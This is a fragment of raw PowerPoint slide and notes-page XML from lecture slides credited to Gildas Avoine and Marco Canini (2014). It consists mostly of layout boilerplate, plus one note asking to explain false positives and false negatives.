        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CECD429F-9FC8-8F45-A35D-AFB8E7E3EE3F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{160EE38C-AED3-3646-9A92-E93328C09A39}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7B73083C-C83A-FA44-AFBF-ADF240221A14}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH"/>
              <a:t>Explain what are false positive and false negative.</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2575" y="4624667"/>
            <a:ext cx="8556625" cy="1313323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1801934" y="5937990"/>
            <a:ext cx="7037266" cy="373162"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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dirty="0">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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>+</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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFil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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{760BC381-ACB7-C64F-85E6-C4C4B22DE34D}"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smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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381093" y="3733800"/>
            <a:ext cx="3255264"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859305" y="6423585"/>
            <a:ext cx="3316941" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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169404" y="3995737"/>
            <a:ext cx="3898272"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6423585"/>
            <a:ext cx="3005138" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{900C2BC2-BEBB-E545-B148-352560EFD9BD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr/>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smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr/>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953000" y="3995737"/>
            <a:ext cx="3108960"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6423585"/>
            <a:ext cx="3005138" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr/>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33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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FF893519-13E9-EA44-A6DF-FCE0E8BBCE10}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>+</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3176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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223185" y="0"/>
            <a:ext cx="260909" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8068235" y="282574"/>
            <a:ext cx="91440" cy="13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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0815FA05-4B4A-2A49-9756-504CEA93867E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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Normal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EB6D99CD-758A-8E44-A87E-DEF43D26546F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
